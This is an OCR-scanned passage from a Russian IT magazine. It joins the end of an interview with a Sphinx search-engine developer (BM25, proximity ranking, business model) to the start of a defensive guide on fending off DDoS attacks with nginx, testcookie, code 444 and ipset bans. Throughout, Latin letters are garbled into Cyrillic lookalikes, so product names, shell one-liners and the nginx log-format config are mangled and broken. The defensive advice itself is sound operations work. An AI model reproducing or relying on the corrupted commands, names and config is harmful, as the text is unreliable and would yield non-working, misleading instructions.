требование. А второе требование, противо- 
речащее этому первому, — не просто «найти» 
документы, но отранжировать, переставить их 
наиболее качественно. 

Представь, что тебе нужно не просто 
максимально быстро обработать этот список, 
но обработать его осмысленно. Нужно вы- 
плюнуть не 3000 результатов поиска в произ- 
вольном порядке (или, например, в порядке 
возрастающего идентификатора документа), 
а в том порядке, какой пользователь счи- 
тает релевантным. Отдельный фокус здесь 
заключается в том, что нет единого понятия 
релевантности. 

Для одной и той же пары «запрос и до- 
кументы» разные люди могут сказать разное. 

Когда лично я ищу слово «зрЫпх», меня, ско- 
рее всего, интересует мой собственный веб- 
сайт. А если я «руссо туристо облико морале» 
и я захожу на страницу Ооодіе с египетского 
ІР-адреса, то вряд ли меня волнует поисковый 
сервер. Вероятнее всего, мне нужно узнать, 
когда ближайший тур на песчаном багги до 
этого самого сфинкса отходит из моего отеля. 

Казалось бы — один и тот же документ, 
один запрос, но для двух разных людей они 
имеют очень разный вес. Запрос может быть 
одинаковым, нотак называемая информацион- 
ная потребность — разная. Поэтому товарищам, 
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у которых эта информация есть (то есть веб- 
гигантам вроде боодіе или Яндекс], приходит- 
ся угадывать информационную потребность 
пользователя по всяким другим сигналам — 
ІР-адресу, языку в браузере, истории поис- 
ков, истории показа объявлений, просмотрам 
сайтов и так далее. В той мере, в какой они до 
таких данных могут дотянуться, конечно. 



ФОРМУЛА ВМ25 



Качество поиска, если говорить очень 
упрощая, — это усредненная степень счастья 
каждого отдельного пользователя. В идеале: 
я коряво формулирую свою информационную 
потребность, а поисковая машина «делает 
магию» — угадывает по всем явным и не очень 
сигналам, какой же именно документ мне 
дико нужен, и возвращает именно его. Таких 
сигналов приходится анализировать довольно 



много. Но Ореп Боигсе поисковики обычно 
анализируют крайне мало. 

Некоторое время назад у меня вообще 
была присказка — мол, типичный Ореп Зоигсе 
поисковик (да и не только Ореп Зоигсе) для 
ранжирования использует всего один фактор. 
Общепринятую статистическую функцию 
ВМ25, которая смотрит на частоты слов в кол- 
лекции (настолько они частые или редкие) и на 
частоты слов в конкретном документе. 

Формулу ВМ25 придумали где-то в 80-х, а в 
начале 2000-х довольно тривиальным образом 
расширили, чтобы уметь взвешивать доку- 
менты о многих полях и назначать этим полям 
разный вес. 

Но есть проблема: ВМ25 вообще не смотрит 
на взаимные позиции слов. То есть три слова, 
как угодно размазанные по документу, и три 
слова, которые стоят рядом и образуют точную 



фразу, не отличаются вообще никак. И десять 
лет назад это не устраивало даже меня. 

Думаю, даже большинство коммерческих 
поисковиков использует ее до сих пор. Несмо- 
тря на полное игнорирование позиций, фор- 
мула достаточно качественная. Тем не менее 
в коммерческих проектах неустанно работают 
над новыми технологиями, заодно продвигая 
науку. Если незатейливую реализацию ВМ25 
сравнить с теми сложными формулами ранжи- 
рования, которые там крутятся, естественно, 
она даст худшие результаты. Но она достаточ- 
но неплоха. 

По сути, ВМ25 — это сумма частоты слова 
(ТР), умноженной на ЮР — относительную 
частоту слова в коллекции, для каждого слова 
в запросе. Это опять на пальцах, потому что 
на самом деле там запрятано еще несколько 
передаточных коэффициентов, которые демп- 
фируют, сглаживают частоты и смотрят на дли- 
ну документа. Скажем, у тебя есть документ, 
в котором слово встретилось один раз, и есть 
другой документ, где оно встретилось сто раз. 
Зато какое-то другое, в десять раз более ред- 
кое слово, встретилось там чаще. Если просто 
перемножать такие метрики — будет плохо. 
Слишком большое количество вхождений 
более плохого (менее редкого) слова сильно 
заспамит результат. Поэтому ТР засовывается 
под логарифм. 

Что за ТР, ЮР? ЮР значит іпѵегве сіоситепі 
{геяиепсу, обратная частота документа — ме- 
трика того, насколько слово редкое. Если оно 
максимально редкое — встречается всего раз 
на всю коллекцию, то метрика максимизиру- 
ется и стремится к единице. Если наоборот — 
встречается в каждом документе, метрика 
минимизируется и стремится к нулю. Чем реже 
слово, тем лучше его ЮР. Когда всего один 
документ на всю твою коллекцию из миллиона 
или миллиарда — это хорошо. Есть еще одна 
тупая метрика — ТР (іегт ІТедиепсу). Частота 
слов в текущем документе, который ты об- 
рабатываешь. То есть сколько вхождений этого 
слова вообще есть. Просто посчитать. 

Но давай разберем, как работает запрос 
из двух слов. Что он должен делать, чтобы 
исполниться и отранжировать результаты, 
при помощи классической частотной функ- 
ции ВМ25? Это работаеттак: берем список 
документов по одному слову. Он отсортирован 
по возрастанию номера документа. Берем 
второй список. Бежим по обоим спискам 
одновременно и выбираем те документы, у ко- 
торых номер совпал. Просто пересекаем два 
списка. Получаем третий список — это все до- 
кументы, в которых есть два наших ключевых 
слова. Осталось их отранжировать. То есть 
посчитать ту или иную функцию ранжирова- 
ния, например ВМ25. 

Как это сделать? Для этого нужно заранее, 
в момент построения индекса, рядом с каждым 
номером документа, в списке документов (на 
который из словаря есть указатель), положить 
не только номер, но и число вхождений этого 
слова в этот документ, ТР. А в самом словари- 
ке положить не только слово и указатель на 
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список документов, но еще и сравнительную 
частоту этого слова во всей коллекции, ЮР. 
Она тоже рассчитывается в момент индекса- 
ции текста. Мы читаем с диска вдвое больше 
данных, когда бежим по двум спискам и пере- 
секаем их. При пересечении мы не смотрим на 
ТР (частоты), но после того, как у документов 
совпали номера, — у нас и частоты есть. У нас 
есть ТР — из списка документов, и есть ЮР — 
из словарика. Мы просто перемножаем их, 
складываем и все. Задача решена. 

Так вот, присказка раньше была такая: 
если у многих поисковиков всего один ранжи- 
рующий фактор (та самая ВМ25), то у ЗрЫпх 
их целых два. Один — ВМ25, потому что куда 
без нее? Второй — степень близости. Степень 
совпадения запроса как фразы с документом. 
Очень простая на самом деле штука. Сейчас 
уже все посложнее и присказка уже невер- 
на — факторов куда больше двух. Ріо степень 
близости по-прежнему активно используется. 

Берем запрос и считаем такое число: 
сколько слов мы можем оставить в запросе, 
чтобы выходить на отдельно взятый до- 
кумент. Понятно, что единицу мы насчитаем 
всегда — хоть одно слово должно совпасть. 

А если у нас два слова стоят в запросе рядом 
и абсолютно такая же цитата встречается 
в документе, значит наш фактор близости 
равен двум. Или, формально, длина наиболь- 
шей общей подпоследовательности равна 
двум. Соответственно, чем больше это число, 
тем выше в выдаче будет стоять документ. 
Максимизируется степень близости тогда, 



когда в документе есть точное совпадение 
для нашего запроса. Дефолтная формула 
ранжирования до сих пор такая, но с тех пор 
ситуация у нас еще немного улучшилась и 
будет улучшаться дальше. 

Фактор близости работает немного слож- 
нее, чем ВМ25. Чтобы его посчитать, не отде- 
лаешься предрассчитанным числом слов. Тут 
нужно не просто хранить список документов, 
но хранить тот факт, что в документе номер 
123 слово «Вася» встретилось в позициях 10, 
20 и 30. А слово «Петров» в этом же документе 
встретилось в позициях 11, 48 и 92. И нужно 
не только выяснить, что пара номеров 123 и 
123 совпала для слов «Вася» и «Петров» и 
поэтому оба слова есть в документе номер 123 
и он удовлетворяет запросу «Вася Петров». 
Еще после этого нужно пробежаться по всем 
позициям первого и второго слова в этом до- 
кументе и посмотреть — о, а в этом месте они у 
нас стояли рядом. Ништяк. Это же совпадение 
фразы. Давайте этот факту себя отметим и 
используем при ранжировании как одну из 
переменных. В литературе это называется 
факторами или сигналами. 

В принципе, все текстовые факторы 
при ранжировании опираются на это. Они 
всегда рассчитываются по позициям и прочей 
привязанной информации. Если слово было 
написано жирным — теоретически поисковик 
может это использовать. Мы не используем, но 
теоретически — сделать можно. 

Для ранжирования существует ряд фак- 
торов. Две категории — текстовые и внетек- 



стовые. Текстовые — мы обнюхиваем позиции 
и привязанную к ним информацию и по этим 
позициям делаем всякие выводы. На самом 
деле — считаем всякие статистические штуч- 
ки. Типа что такое ТР? Это просто сумма числа 
позиций. Что такое ЮР? Это тоже статистиче- 
ская штука, но только заранее посчитанная по 
всей коллекции. Можно еще всякий смешной 
фарш смотреть — на близость смотреть, что 
І_С5 (І_опде5І Соттоп ЗиЬзециепсе) хороший. 
Можно и более умные факторы придумать, 
которые смотрят на близость слов. Все, что 
связано с текстом запроса и документа, в 
конечном итоге сводится к разнообразным 
методам обнюхивания позиций и прочей мета- 
информации, которую мы сохранили. 

Но еще есть внетекстовые факторы. Тот 
же раде гапк, который у всех на слуху. Что это 
такое? Это фактор, не имеющий ни малейшего 
отношения к тексту запроса и документа. Это 
некий коэффициент, который показывает, на- 
сколько хорошо на этот сайт и на эту страницу 
ссылаются извне. Просто некий факт, который 
привязан к номеру документа, к этому номеру 
123 в списках для слов «Вася» и к той же самой 
единичке, что привязана к слову «Петров». 

Упорядочивание результатов может 
опираться на посчитанную релевантность, 
а может на более сложные факторы. К при- 
меру, сначала на новостном сайте идут все 
результаты за последний год, какими бы 
плохими с точки зрения релевантности они ни 
были, а после — все, что старше года, сортиру- 
ется по релевантности. Вполне корректный и 
разумный метод упорядочивания результатов, 
пользователям может нравиться. 

У нас в БрЫпх в один прекрасный момент 
еще появилась такая штука — считалка выра- 
жений. Можно написать произвольное ариф- 
метическое выражение, и она его посчитает. 
Она довольно быстрая по замерам — местами 
в десятки раз быстрее той, что встроена в 
Му5С|1_. И возникла следующая чудная идея — 
прикрутить ее тоже к ранжированию. Я на- 
писал специально скриптуемый ранкер, такую 
функцию ранжирования, которая считает не- 
сколько всяких факторов по тексту запроса и 
документа и даеттебе произвольно их смешать 
в твоей собственной формуле. С его помощью 
можно тестировать собственные формулы 
ранжирования, описывая их прямо в поиско- 
вых запросах. 

Формула ранжирования, которую можно 
таким образом описать, — это комбинация 
нескольких факторов, «кубиков». Один из 
факторов — это бессмертная ВМ25 — как без 
нее? Можно и просто учитывать количество 
совпавших слов в каждом конкретном поле, 
другие частотные факторы, типа минималь- 
ной и максимальной ЮР. Есть и еще более 
хитрые факторы, типа позиции первого 
наилучшего совпадения в данном поле, или 
там максимума числа слова, совпавших в 
скользящем окне заданной ширины. Мы сами 
придумали считать примерно с полдесятка 
факторов, и еще часть запросили пользо- 
ватели. Итого сейчас там где-то 12 разных, 
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ПЛАТИТЬ ЗАРПЛАТУ» 



местами довольно странных факторов, и со 
временем будет только больше, — и вот их 
можно какугодно скомбинировать и постро- 
ить из них свою собственную, сколь угодно 
сложную формулу ранжирования. 



ГДЕ ИСПОЛЬЗУЕТСЯ 5РНІЫХ? 



Очень сложно оценить количество внедре- 
ний нашего движка. В случае с Ореп Боигсе 
продуктом этого никогда не знаешь. Можно 
приблизительно ориентироваться по числу за- 
качек, считать пропорции и так далее. Сейчас 
я оцениваю количество установок в десятки 
или даже сотни тысяч. Разумеется, не каждая 
закачка в итоге превращается в установку, 
но, думаю, десять тысяч разных сайтов мы 
уже точно пробили. Сто тысяч? Может быть. 
Миллион? Вряд ли. 

Был эпизод, когда я узнал, что БрЫпх 
используется на ТИе Рігаіе Вау. Это, конечно, 
антиреклама сточки зрения корпоративных 
пользователей, но факт показательный. 

С каким-то апдейтом мы сломали что-то не- 
очевидное внутри БрЫпх, и один из этой банды 
написал нам. То есть я вступил в переписку с 
каким-то человеком и только на пятом е-таіі 
обратил внимание на домен, с которого он 
пишет. Так и узнал. 

К счастью или к несчастью, почти все 
торрент-сайты мира используют БрЫпх. ТЬе 

Рігаіе Вау вот использует. Міпіпоѵа, пока ее 
не засудили и не закрыли, крутилась на нем. 
РиТгаскег тоже, говорят. Никого оттуда лично 
не знаю, но «птички» летают. 

Кстати, Сгаідзіізі, который впереди всех по 
количеству поисковых запросов, — не самый 
большой по объему индексируемых данных. 

Есть ряд проектов типа ВоагбРеасІег, БосіаІ 
Рабат и еще некоторых, которые индексируют с 
помощью БрЫпх более 20 миллиардов доку- 
ментов каждый. Думаю, суммарно все проекты, 
использующие БрЫпх, уже перевалили за 100 
миллиардов документов и за 1 миллиард запро- 
сов в день. Так что мы миллиардеры! 

У крупного проекта масса потребностей. И я 
не удивлюсь, если внутри Соодіе, РасеЬоок 
и УаЬоо! используется БрЫпх. Понятно, что 
не для поиска на «морде», но для какой-то 
мелкой задачи, вроде поиска по багтрекеру 
вот этой конкретной группы — почему нет, 
решение работает, и все хорошо. 



ЗАРАБОТАТЬ НА ОРЕИ 501ІРСЕ 



БрМпх, видимо, был достаточно неплох даже 
на начальной стадии, так что свою умеренную 



популярность он снискал сразу. Определен- 
ный интерес и легкий трафик были изначаль- 
но. Не было такого, что я выложил его, а потом 
в течение трех лет смотрел: «о, сегодня ко 
мне один человек за день зашел, а завтра — 
гигантский прорыв, уже трое!» 

О деньгах речи сначала и не шло. Поначалу 
мотивация была проста — давайте выложим, 
ведь МуБСИ выложил, и мы выложим, вдруг 
что-то получится. А потом, через какое-то не 
очень большое время, БрЫпх действительно 
начал приносить деньги. 

Сейчас у нас три основных источника дохо- 
да. Это лицензирование, заказы на разработку 
фич от клиентов и консалтинг. 

Первые деньги появились, когда Петр 
Зайцев показал БрМпх клиенту и тому очень 
понравилось, но понадобилась дополнитель- 
ная функция. Речь шла о языке запросов. 

До этого БрЫпх умел искать все слова сразу 
или хотя бы одно слово в документе. Были 
так называемые режимы матчинга, до сих 
пор в движке и АРІ прослеживаемые. То есть 
БрМпх искал все слова из запроса, любое 
слово, фразу и... кажется, все. А клиенту 
нужно было кое-что посложнее и поинтерес- 
нее: чтобы с булевыми операторами, с произ- 
вольной вложенностью скобок и так далее. 
Вот это была первая большая коммерческая 
разработка. Конечно, помимо этого им еще 
потребовалось много разного, но язык запро- 
сов стал одной из самых крупных и заметных 
фич. В Ореп Боигсе версию это, конечно, 
вошло тоже. 

С тех пор так и повелось: клиент говорит — 

очень хочется иметь такую-то фичу. И хочется 
ее побыстрее, а не когда вы ее там сделаете 
сами по себе. Ну, мы и делаем, чего уж :). 

Для меня это были первые существенные 
деньги, но они пришли не за консалтинг по 
настройке, а за разработку. И до сих пор зна- 
чительную часть денег наша компания зараба- 
тывает не на консалтинге, а на разработке. 

А вообще список подобных «бесплатных», 
внутренних фич-реквестов у меня и сейчас 
на 200 позиций как минимум. Там все — от 
крохотных затычек до больших, интересных 
кусков функционала. 

За лицензирование платят клиенты, 
которые встраивают БрМпх и не хотят от- 
крывать свои исходники. Дело в том, что вся 
наша кодовая база доступна под лицензией 
СР1_, поэтому даже коммерческому проекту 
пришлось бы публиковать изменения под этой 
же лицензией. Это не всем удобно. 



Давайте сравним Му50І_ с Огасіе и ВесІ Наі 
с МісговоН. Сразу понятно, что если цель — 

заработать максимальное количество бабла, 
лучше не стартовать Ореп Боигсе проект во- 
все. Не известен пока еще ни один Ореп Боигсе 
проект, который жил бы сильно лучше коммер- 
ческих аналогов в той же нише. Тем не менее 
какие-то доходы с этого у нас есть, сделки 
довольно разнообразны, это интересно, и для 
нас это была единственная реально доступная 
модель на старте. 



РАСПРЕДЕЛЕННАЯ КОМАНДА 



Исторически сложилось так, что у нас рас- 
пределенная команда. Если бы я сразу нанял 
всех нужных людей в городе-герое Воронеже 
и всем было бы удобно ходить в офис, то у нас 
сейчас был бы мегаофис разработки в Воро- 
неже. Ну и, очевидно, отдельный офис продаж 
в США. Но сложилось иначе. Каждого нового 
подручного мы нанимали в новом городе. 

Мы изначально росли органически, без 
накачки инвестиционными деньгами. Вот 
потихоньку выросли до десятка человек и 
собираемся расти еще. Но я пока не чувствую 
необходимости брать инвестиции, чтобы 
акселерировать рост бизнеса. Ну знаете, если 
по-русски, у меня нет ситуаций вроде: «упс, 
третий месяц нечем платить зарплату». 

География у нас обширная: Воронеж, 
Краснодар, Новосибирск, Сиэтл, Бойсе. Еще 
Питер и, кажется, Саранск. Я, по-моему, кого- 
то забыл... точно, у меня где-то записано очень 
длинное название румынского города, где у 
нас сидит европейский консультант! 

Сейчас у нас четыре с половиной разработ- 
чика и два сейлза (оба в США). Почему четыре 
с половиной? Есть четыре матерых и сильных 
разработчика и один, скажем так, стажер — но 
лично мне-то приходится заниматься совсем 
не только разработкой. Так что людей-то выхо- 
дит пять, потому что со мной, но разработчиков 
четыре с половиной получается, потому что 
регулярно без меня. 

Общаемся электронно — е-таіі, Бкуре 
и ІКС на ежедневной основе. Понятно, что 
если кого-то где-то нет, а он срочно ну- 
жен — сотовый телефон никто не отменял, и 
мы будем дозваниваться и искать. Но такое 
требуется редко. 

Людей мы постоянно ищем. С этим, как 
и везде в ІТ, вообще настоящая беда. Ореп 
Боигсе в этом никак не помогает, скорее 
даже вредит. У меня есть теория, что люди 
думают: батюшки-светы! — какие-то слож- 
ные С++ коды, какой-то человек-програм- 
мист говорит на конференциях зажигатель- 
ные, но непонятные слова, еще удаленная 
работа, как это вообще... да их там, наверное, 
палкой бьют, за руку к батарее приковывают 
и вообще у них наверняка офиса нету! И пу- 
гаются даже резюме прислать. Такая теория. 
На самом деле у нас все куда более приятно 
и демократично, не говоря уж об интерна- 
ционале, — думаю, Адам, Адриан, Алексей, 
Антон, Глория, Евгений, Илья, Ричард и 
Станислав подтвердят. ПЕ 
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Артем Гавриченков, ведущий разработчик сети фильтрации трафика Огаіог 
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Борьба с ОБоЗ-атаками — работа не только сложная, но и увлекательная. 
Неудивительно, что каждый сисадмин первым делом пытается организовать 
оборону своими силами — тем более что пока еще это возможно. 
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Отбить 00о5 



ы решили помочь вам в этом нелегком деле и опубликовать 
несколько коротких, тривиальных и не универсальных сове- 
тов по защите вашего сайта от атак. Приведенные рецепты 
не помогут вам справиться с любой атакой, но от большинства опас- 
ностей они вас уберегут. 




ПРАВИЛЬНЫЕ ИНГРЕДИЕНТЫ 

Суровая правда такова, что многие сайты может положить любой 
желающий, воспользовавшись атакой БІоѵѵІогіз, наглухо убивающей 
АрасЬе, или устроив так называемый 5ѴІ\І-флуд с помощью фермы 
виртуальных серверов, поднятых за минуту в облаке Атагоп ЕС2. Все 
наши дальнейшие советы по защите от ОйоБ своими силами основы- 
ваются на следующих важных условиях. 




ОТКАЗАТЬСЯ ОТ ѴѴШ00ѴѴ5 5ЕКѴЕК 

Практика подсказывает, что сайт, который работает 
на винде (2003 или 2008 — неважно), в случае ОйоБ 
обречен. Причина неудачи кроется в виндовом сетевом 
стеке: когда соединений становится очень много, то 
сервер непременно начинает плохо отвечать. Мы не 
знаем, почему ѴѴіпсІоѵѵз Бегѵег в таких ситуациях работает настолько 
отвратно, но сталкивались с этим не раз и не два. По этой причине речь 
в данной статье будет идти о средствах защиты от 00о5-атак в случае, 
когда сервер крутится на І_іпих. Если вы счастливый обладатель от- 
носительно современного ядра (начиная с 2.6), то в качестве первичного 
инструментария будут выступать утилиты ірІаЫез и ірзеі (для быстрого 
добавления ІР-адресов), с помощью которых можно оперативно за- 
банить ботов. Еще один ключ к успеху — правильно приготовленный 
сетевой стек, о чем мы также будем говорить далее. 




РАССТАТЬСЯ С АРАСНЕ 

Второе важное условие — отказ от АрасЬе. Если у вас, 
не ровен час, стоит АрасЬе, то как минимум поставьте 
перед ним кеширующий прокси — пдіпх или ІідШрсІ. 
АрасЬе'у крайне тяжело отдавать файлы, и, что еще 
хуже, он на фундаментальном уровне (то есть неиспра- 
вимо) уязвим для опаснейшей атаки БІоѵѵІогіз, позволяющей завалить 
сервер чуть ли не с мобильного телефона. Для борьбы с различными 
видами ЗІоѵѵІогіз пользователи АрасЬе придумали сначала патч Апіі- 
5І0ѴѴІ0П5.СШ, потом ігюсІ_поІоп5, затем тосІ_апІіІоп5, тосИітШрсопп, 
тосІ_гедбтеои*.. Но если вы хотите спокойно спать по ночам, проще 
взять НТТР-сервер, неуязвимый для ЗІоѵѵІогіз на уровне архитектуры 
кода. Поэтому все наши дальнейшие рецепты основываются на пред- 
положении, что на фронтенде используется пдіпх. 



ОТБИВАЕМСЯ ОТ 0005 

Что делать, если пришел ОйоБ? Традиционная техника самообороны — 
почитать лог-файл НТТР-сервера, написать паттерн для дгер (отлав- 
ливающий запросы ботов) и забанить всех, кто под него подпадет. Эта 
методика сработает... если повезет. Ботнеты бывают двух типов, оба 
опасны, но по-разному. Один целиком приходит на сайт моменталь- 
но, другой — постепенно. Первый убивает все и сразу, зато в логах 
появляется весь полностью, и если вы их продгераете и забаните все 
ІР-адреса, то вы — победитель. Второй ботнетукладывает сайт нежно 
и осторожно, но банить вам его придется, возможно, на протяжении 
суток. Любому администратору важно понимать: если планируется 
бороться дгер'ом, то надо быть готовым посвятить борьбе с атакой пару 
дней. Ниже следуют советы о том, куда можно заранее подложить со- 
ломки, чтобы не так больно было падать. 

ИСПОЛЬЗОВАТЬ МОДУЛЬ ТЕ5ТС00КІЕ 

Пожалуй, самый главный, действенный и оперативный 
рецепт этой статьи. Если на ваш сайт приходит 0йо5, 
то максимально действенным способом дать отпор 
НнЩН может стать модуль Іезісоокіе-пдіпх ( ЬМрз://діІЬиЬ.сот/ 




кѵргігеіЛезІсоокіе-пдіпх-тосІиІе ). разработанный хабрапользователем 
йкургігеі. Идея простая. Чаще всего боты, реализующие НТТР-флуд, 
довольно тупые и не имеют механизмов НТТР соокіе и редиректа. 
Иногда попадаются более продвинутые — такие могут использовать 
соокіез и обрабатывать редиректы, но почти никогда йоБ-бот не несет 
в себе полноценного ЭаѵаБсгірІ-движка (хотя это встречается все чаще 
и чаще). Тезісоокіе-пдіпх работает как быстрый фильтр между ботами и 
бэкендом во время І_7 00о5-атаки, позволяющий отсеивать мусорные 
запросы. Что входит в эти проверки? Умеет ли клиент выполнять НТТР 
Ресіігесі, поддерживает ли ЭаѵаБсгірЦ тот ли он браузер, за который 
себя выдает (поскольку ЭаѵаБсгірІ везде разный и если клиент говорит, 
что он, скажем, Рігеіюх, то мы можем это проверить). Проверка реализо- 
вана с помощью кукисов с использованием разных методов: 

• «5еІ-Соокіе» + редиректспомощью301 НТТР БосаЬоп; 

• «5еІ-Соокіе» + редиректс помощью НТМІ_теІа геігезЬ; 

• произвольным шаблоном, причем можно использовать ЭаѵаЗсгірЕ 



Чтобы избежать автоматического парсинга, проверяющая кукиса 
может быть зашифрована с помощью АЕ5-128 и позже расшифрована 
на клиентской стороне ЭаѵаБсгір* В новой версии модуля появилась 
возможность устанавливать кукису через БІазЬ, что также позволяет 
эффективно отсеять ботов (которые БІазЬ, как правило, не поддержива- 
ют), но, правда, и блокирует доступ для многих легитимных пользовате- 
лей (фактически всех мобильных устройств). Примечательно, что начать 
использовать Іезісоокіе-пдіпх крайне просто. Разработчик, в частности, 
приводит несколько понятных примеров использования (на разные 
случаи атаки) с семплами конфигов для пдіпх. 

Помимо достоинств, у Іезісоокіе есть и недостатки: 

• режет всех ботов, втом числе боодІеЬо* Если вы планируете оста- 
вить Іезісоокіе на постоянной основе, убедитесь, что вы при этом не 
пропадете из поисковой выдачи; 

• создает проблемы пользователям с браузерами І_іпкз,ѵѵЗт и им по- 
добными; 

• не спасает от ботов, оснащенных полноценным браузерным движком 
с ЭаѵаБсгірІ. 



Словом, ІезІсоокіе_тосІиІе не универсален. Но от ряда вещей, 
таких как, например, примитивные инструментарии на Эаѵа и С#, он 
помогает. Таким образом вы отсекаете часть угрозы. 




КОД 444 

Целью ОйоБеров часто становится наиболее ресурсо- 
емкая часть сайта. Типичный пример — поиск, который 
выполняет сложные запросы к базе. Естественно, этим 
могут воспользоваться злоумышленники, зарядив 
сразу несколько десятков тысяч запросов к поис- 
ковому движку. Что мы можем сделать? Временно отключить поиск. 
Пускай клиенты не смогут искать нужную информацию встроенными 
средствами, но зато весь основной сайт будет оставаться в работоспо- 
собном состоянии до тех пор, пока вы не найдете корень всех проблем. 
ІЧдіпх поддерживает нестандартный код 444, который позволяет про- 
сто закрыть соединение и ничего не отдавать в ответ: 



[ шой&жша «/заагсіх 
геііигп 444; 

Таким образом можно, например, оперативно реализовать филь- 
трацию по ІІПІ_. Если вы уверены, что запросы к Іосаііоп /зеагсЬ при- 
ходяттолько от ботов (например, ваша уверенность основана на том, 
что на вашем сайте вообще нет раздела /зеагсЬ), вы можете устано- 
вить на сервер пакет ірзеі и забанить ботов простым зЬеІІ-скриптом: 



ірзе* -И Ьап ірМазМ 

*аі! -* ассеззЛо^ | ыЫІе геасі І.ІІМЕ; сіо есЬо "$І.ІІМЕ" | \ 
си* -сі "" -ТЗ | си* -сГ 1 -Т2 | §гер -ц 444 && ірзе* -А 
Ьап "${!.%% *}"; сіопе 
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Если формат лог-файлов нестандартный (не сотЬіпесІ) или тре- 
буется банить по иным признакам, нежели статус ответа, — может 
потребоваться заменить сиі на регулярное выражение. 



• вбольшинствеслучаевсобаказарыта всложности итяжеловес- 
ности запросов к базе данных. Здесь поможет встроенная в движок 
базы данных 501-директива ехріаіп. 



БАНИМ ПО ГЕОПРИЗНАКУ 

Нестандартный код ответа 444 может пригодиться 
еще и для оперативного бана клиентов по гео- 
признаку. Вы можете жестко ограничить отдельные 
страны, от которых испытываете неудобство. Ска- 
жем, вряд ли у интернет-магазина фотоаппаратов из 
Ростова-на-Дону много пользователей в Египте. Это не очень хоро- 
ший способ (прямо скажем — отвратительный), поскольку данные 
СеоІР неточны, а ростовчане иногда летают в Египет на отдых. Но 
если вам терять нечего, то следуйте инструкциям: 

1. Подключите к пдіпх БеоІР-модѵль ( ѵѵікі. пдіпх. огд/ННрбеоірМосІиІе ). 

2. Выведите информацию о геопривязке вассезвіод. 

3. Далее, модифицировав приведенный выше шелл-скрипт, 
продгерайтеассевзіод пдіпх'а и добавьтеотфутболенныхпо геогра- 
фическому признаку клиентов в ба н. 

Если, к примеру, боты по большей части были из Китая, то это 
может помочь. 

НЕЙРОННАЯ СЕТЬ (РОС) 

Наконец, вы можете повторить опыт хабрапользо- 
вателя ЙЗаѵеТбеРЫг, который взял нейронную сеть 
РуВгаіп, запихал в нее лог и проанализировал запро- 
■гіІнІН сы ( ЬаЬгаЬаЬг.ги/ро5І/136237 ). Метод рабочий, хотя и 
не универсальный :). Но если вы действительно знае- 
те внутренности своего сайта — а вы, как системный администратор, 
должны, — то у вас есть шансы, что в наиболее трагических ситуа- 
циях такой инструментарий на основе нейронных сетей, обучения и 
собранной заранее информации вам поможет. В этом случае весьма 
полезно иметь ассезз.Іод до начала ООоЗ'а, так как он описывает 
практически 100% легитимных клиентов, а следовательно, отличный 
сіаіазеі для тренировки нейронной сети. Тем более глазами в логе 
боты видны не всегда. 

ДИАГНОСТИКА ПРОБЛЕМЫ 

Сайт не работает — почему? Его ОйоЗ'ят или это баг движка, не за- 
меченный программистом? Неважно. Не ищите ответа на этот вопрос. 
Если вы считаете, что ваш сайт могут атаковать, обратитесь к компани- 
ям, предоставляющим защиту от атак, — у ряда анти-00о5-сервисов 
первые сутки после подключения бесплатны — и не тратьте больше 
время на поиск симптомов. Сосредоточьтесь на проблеме. Если сайт 
работает медленно или не открывается вообще, значит, у него что-то не 
в порядке с производительностью, и — вне зависимости оттого, идет 
ли 00о5-атака или нет, — вы, как профессионал, обязаны понять, чем 
это вызвано. Мы неоднократно были свидетелями того, как компания, 
испытывающая сложности с работой своего сайта из-за 00о5-атаки, 
вместо поиска слабых мест в движке сайта пыталась направлять заяв- 
ления в МВД, чтобы найти и наказать злоумышленников. Не допускайте 
таких ошибок. Поиск киберпреступников — это трудный и длительный 
процесс, осложненный самой структурой и принципами работы сети 
Интернет, а проблему с работой сайта нужно решать оперативно. За- 
ставьте технических специалистов найти, в чем кроется причина паде- 
ния производительности сайта, а заявление смогут написать юристы. 

ЮЗАЙТЕ ПРОФАЙЛЕР И ОТЛАДЧИК 

Для наиболее распространенной платформы созда- 
ния веб-сайтов — РНР + Му5С11_ — узкое место можно 
искать с помощью следующих инструментов: 

• профайлерХбеЬид покажет, на какие вызовы при- 
ложениетратитбольше всего времени; 

• встроенный отладчик АРй и отладочный вывод в логошибок помогут 
выяснить, какой именно код выполняетэти вызовы; 
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Если сайт лежит навзничь и вы ничего не теряете, отключитесь от 
сети, посмотрите логи, попробуйте их проиграть. Если не лежит, то 
походите по страницам, посмотрите на базу. 

Пример приведен для РНР, но идея справедлива для любой 
платформы. Разработчик, пишущий программные продукты на каком 
бы то ни было языке программирования, должен уметь оперативно 
применять и отладчик, и профилировщик. Потренируйтесь заранее! 




АНАЛИЗИРУЙТЕ ОШИБКИ 

Проанализируйте объем трафика, время ответа 
сервера, количество ошибок. Для этого смотрите 
логи. В пдіпх время ответа сервера фиксируется в 
логе двумя переменными: гедиезМіте и ир5Ігеат_ 
гезроп5е_Ііте. Первая — это полное время вы- 
полнения запроса, включая задержки в сети между пользователем 
и сервером; вторая сообщает, сколько бэкенд (АрасЬе, рЬр^рт, 
иѵѵзді...) выполнял запрос. Значение ир5Ігеат_ге5роп5е_Ііте 
чрезвычайно важно для сайтов с большим количеством динамиче- 
ского контента и активным общением фронтенда с базой данных, 
им нельзя пренебрегать. В качестве формата лога можно использо- 
вать такой конфиг: 



Іо^-Еогта* хакер_1о§ ’$гето1:е_асІсІг - $гето1:е_и5ег [$Еіте_1оса1] 
'"$гедие5І=" $5І:а1:и5 $ЬосІу Ьѵііез вепі: ' 

' "$Іі1:1 :р_ге-Ре г ег" "$1і 1:1:р_и 5ег_а §еп1:" $гед и ез 1:_1:іте \ 

$ирз1:геат_ге5роп5е_1:іте ' ; 



Это сотЬіпесІ -формат с добавленными полями тайминга. 



ОТСЛЕЖИВАЙТЕ количество 
ЗАПРОСОВ В СЕКУНДУ 

Также посмотрите на число запросов в секунду. 

В случае пдіпх вы можете примерно оценить эту 
величину следующей вЬеІІ-командой (переменная 
АССЕ55_І_06 содержит путь к журналу запросов 
пдіпх в сотЬіпеб-формате): 




есНо $( ($(Т§гер -с "$(епѵ І_С_АІ_І_=С сІаЕе - -сІа1:е=@$( ($(сІа1:е \ 
+%б) - 60) ) +%сІ/%Ь/%Ѵ : %Н : %М) " ,, $АССЕ55_ШС")/60) ) 

По сравнению с нормальным для этого времени дня уровнем 
количество запросов в секунду может как падать, так и расти. Растут 
они в случае, если пришел крупный ботнет, а падают, если пришед- 
ший ботнет обрушил сайт, сделав его полностью недоступным для 
легитимных пользователей, и при этом ботнет статику не запраши- 
вает, а легитимные пользователи запрашивают. Падение количества 
запросов наблюдается как раз за счет статики. Но, так или иначе, мы 
